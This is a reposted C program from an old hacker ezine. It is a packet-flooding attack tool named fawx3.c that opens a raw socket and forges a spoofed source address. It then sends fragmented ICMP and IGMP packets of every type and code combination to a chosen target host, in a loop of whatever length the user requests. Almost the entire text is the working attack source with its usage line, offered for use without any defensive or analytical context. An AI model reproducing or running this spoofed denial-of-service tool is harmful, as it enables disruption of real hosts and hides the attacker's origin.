Copy Link
Add to Bookmark
Report

fawx3.c

Sends every combination of icmp + igmp types/codes to a host. (In our honest opinion #1)

eZine's profile picture
Published in 
In our honest opinion
 · 8 months ago

/* [og] fawx3.c, sends every type of icmp/igmp type+code to <host> 
* -- heeb (heeb@phayze.com), #og @ irc.ndrsnet.com
*/

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/igmp.h>
#include <netinet/icmp.h>

void banner(void) {
printf("[og] fawx3.c, sends every icmp/igmp type+code combination.\n");
printf(" -- heeb (heeb@phayze.com), #og @ irc.ndrsnet.com\n\n");
}

unsigned int port = 5000;
char junk[] = "hello, swan";

void usage(const char *progname) {

printf("!fawx3! syntax: %s <spoof host> <target host> <number>\n",progname);

}

int resolve( const char *name, unsigned int port, struct sockaddr_in *addr ) {

struct hostent *host;
port = 139;
memset(addr,0,sizeof(struct sockaddr_in));

addr->sin_family = AF_INET;
addr->sin_addr.s_addr = inet_addr(name);

if (addr->sin_addr.s_addr == -1) {
if (( host = gethostbyname(name) ) == NULL ) {
fprintf(stderr,"\nuhm.. %s doesnt exist :P\n",name);
return(-1);
}
addr->sin_family = host->h_addrtype;
memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);
}

addr->sin_port = htons(port);
return(0);

}

unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;

while (nleft > 1) {
sum += *w++;
nleft -= 2;
}

if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}

sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}

int send_icmp(int socket,
unsigned long spoof_addr,
struct sockaddr_in *dest_addr,
int rtype,
int rcode) {

unsigned char *packet;
struct iphdr *ip;
struct icmphdr *icmp;
int rc;

packet = (unsigned char *)malloc(sizeof(struct iphdr) + strlen(junk) + sizeof(struct icmphdr) + 1500);
strcat(packet, junk);
ip = (struct iphdr *)packet;
icmp = (struct icmphdr *)(packet + sizeof(struct iphdr));
memset(ip,0,sizeof(struct iphdr) + strlen(junk) + sizeof(struct icmphdr) + 1500);

ip->ihl = 5;
ip->version = 4;
ip->id = htons(1234);
ip->tos = rand();
ip->frag_off |= htons(0x2000);
ip->ttl = 30;
ip->protocol = IPPROTO_ICMP;
ip->saddr = spoof_addr;
ip->daddr = dest_addr->sin_addr.s_addr;
ip->check = in_cksum(ip, sizeof(struct iphdr));

icmp->type = rtype;
icmp->code = rcode;

if (sendto(socket,
packet,
sizeof(struct iphdr) + strlen(junk) +
sizeof(struct icmphdr) + 2,0,
(struct sockaddr *)dest_addr,
sizeof(struct sockaddr)) == -1) { return(-1); }

ip->tot_len = htons(sizeof(struct iphdr) + strlen(junk) + sizeof(struct icmphdr) + 1500);
ip->frag_off = htons(8 >> 3);
ip->frag_off |= htons(0x2001);
ip->check = in_cksum(ip, sizeof(struct iphdr));

icmp->type = rtype;
icmp->code = rcode;

if (sendto(socket,
packet,
sizeof(struct iphdr) + strlen(junk) +
sizeof(struct icmphdr) + 2,0,
(struct sockaddr *)dest_addr,
sizeof(struct sockaddr)) == -1) { return(-1); }

free(packet);
printf("[og] ICMP type: %d, code: %d",rtype,rcode);
return(0);

}


int send_igmp(int socket,
unsigned long spoof_addr,
struct sockaddr_in *dest_addr,
int rtype,
int rcode) {

unsigned char *packet;
struct iphdr *ip;
struct igmphdr *igmp;
int rc;

packet = (unsigned char *)malloc(sizeof(struct iphdr) + strlen(junk) + sizeof(struct igmphdr) + 1500);
strcat(packet, junk);
ip = (struct iphdr *)packet;
igmp = (struct igmphdr *)(packet + sizeof(struct iphdr));

memset(ip,0,sizeof(struct iphdr) + strlen(junk) + sizeof(struct igmphdr) + 1500);

ip->ihl = 5;
ip->version = 4;
ip->id = htons(1234);
ip->tos = rand();
ip->frag_off |= htons(0x2000);
ip->ttl = 255;
ip->protocol = IPPROTO_IGMP;
ip->saddr = spoof_addr;
ip->daddr = dest_addr->sin_addr.s_addr;
ip->check = in_cksum(ip, sizeof(struct iphdr));

igmp->type = rtype;
igmp->code = rcode;

if (sendto(socket,
packet,
sizeof(struct iphdr) + strlen(junk) +
sizeof(struct igmphdr) + 2,0,
(struct sockaddr *)dest_addr,
sizeof(struct sockaddr)) == -1) { return(-1); }


ip->tot_len = htons(sizeof(struct iphdr) + strlen(junk) + sizeof(struct igmphdr) + 1500);
ip->frag_off = htons(8 >> 3);
ip->frag_off |= htons(0x2001);
ip->check = in_cksum(ip, sizeof(struct iphdr));

igmp->type = rtype;
igmp->code = rcode;

if (sendto(socket,
packet,
sizeof(struct iphdr) + strlen(junk) +
sizeof(struct igmphdr) + 2,0,
(struct sockaddr *)dest_addr,
sizeof(struct sockaddr)) == -1) { return(-1); }

free(packet);
printf(" -- IGMP type: %d, code: %d\n",rtype,rcode);
return(0);

}

int main(int argc, char * *argv) {

struct sockaddr_in dest_addr;
unsigned int i,sock;
unsigned long src_addr;
int ictype = 0;
int iccode = 0;
int igtype = 0;
int igcode = 0;
banner();
if ((argc != 4)) {
usage(argv[0]);
return(-1);
}

if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
fprintf(stderr,"error opening raw socket. <got root?>\n");
return(-1);
}

if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); }
src_addr = dest_addr.sin_addr.s_addr;

if (resolve(argv[2],0,&dest_addr) == -1) { return(-1); }

printf("!fawx3! sending icmp+igmp[frag] attacks to: %s.",argv[2]);
for (i = 0;i < atoi(argv[3]);i++) {
igcode++;
iccode++;
if(igcode > 60) {
igtype++;
igcode=0;
}
if(iccode > 100) {
ictype++;
iccode=0;
}
if(igtype > 15) {
igtype=0;
}
if (send_igmp(sock,
src_addr,
&dest_addr,igtype,igcode) == -1) {
fprintf(stderr,"error sending IGMP packet. <got root?>\n");
return(-1);
}
if (send_icmp(sock,
src_addr,
&dest_addr,ictype,iccode) == -1) {
fprintf(stderr,"error sending ICMP packet. <got root?>\n");
return(-1);
}
usleep(10000);
}
printf(" *eof*\n");
}

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT